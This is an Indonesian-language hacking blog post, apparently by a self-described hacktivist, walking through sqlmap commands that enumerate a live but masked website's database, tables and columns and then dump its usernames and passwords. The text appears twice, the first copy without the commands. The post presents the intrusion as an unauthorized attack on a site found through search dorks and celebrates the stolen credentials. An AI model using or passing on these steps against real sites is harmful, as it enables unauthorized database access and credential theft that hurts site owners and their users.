Introduction SQLMAP web injection Takeover
Sqlmap salah satu tools yg di sukai oleh para hacktivist dalam melakukan injeksi web, mendapatkan database serta menemukan password dan username dari sebuah website, namun ada hal yang harus di perhatikan, sqlmap sendiri banyak yang bisa kita lakukan dengan command2 yang tersedia, namun disini saya hanya berbagi sedikit command dasarnya saja. untuk lebih jelasnya anda bisa mengunjungi situs resminya di sini
disini salah satu target yg akan saya jadikan contoh ialah:
selanjutnya mari kita jalankan sqlmap, anda bisa menggunakan opsi (-h or --help) untuk mengetahui option2 yang sediakan.
selanjutnya untuk melihat database website tersebut gunakan perintah sebagai berikut:
-u = target url
--dbs = Enumerate DBMS databases
terlihat bagian yang saya blok, kita telah mendapatkan database situs tersebut dengan nama unecuae_unec
selanjutnya kita masuk ke databes tersebut untuk melihat table-table yang ada dengan perintah:
-D = DBMS database to enumerate
--tables = Enumerate DBMS database tables
setelah menemukan beberapa table, selanjutnya kita lihat isi dari table user dengan perintah :
-T = DBMS database table to enumerate
--columns = Enumerate DBMS database table columns
terlihat ada beberapa colomn yg berhasil kita temukan salah satunya columns yg kita cari yaitu password beserta username.
langkah selanjutnya melihat user_username serta user_password target kita dengan menggunakan perintah :
success, password beserta username berhasil kita dapatkan =))
regards
Hidemichi-Hiroyuki a.k.a [H2]
pastikan kita telah menemukan target dengan dork-dork yang kalian gunakan.
disini salah satu target yg akan saya jadikan contoh ialah:
http://www.xxxxxxxx.com/about.php?id=1
selanjutnya mari kita jalankan sqlmap, anda bisa menggunakan opsi (-h or --help) untuk mengetahui option2 yang sediakan.
# sqlmap --help
selanjutnya untuk melihat database website tersebut gunakan perintah sebagai berikut:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs
-u = target url
--dbs = Enumerate DBMS databases
terlihat bagian yang saya blok, kita telah mendapatkan database situs tersebut dengan nama unecuae_unec
selanjutnya kita masuk ke databes tersebut untuk melihat table-table yang ada dengan perintah:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables
-D = DBMS database to enumerate
--tables = Enumerate DBMS database tables
setelah menemukan beberapa table, selanjutnya kita lihat isi dari table user dengan perintah :
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns
-T = DBMS database table to enumerate
--columns = Enumerate DBMS database table columns
terlihat ada beberapa colomn yg berhasil kita temukan salah satunya columns yg kita cari yaitu password beserta username.
langkah selanjutnya melihat user_username serta user_password target kita dengan menggunakan perintah :
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump
success, password beserta username berhasil kita dapatkan =))
regards
Hidemichi-Hiroyuki a.k.a [H2]
Comments
Post a Comment
Do Not Fuckin Spamming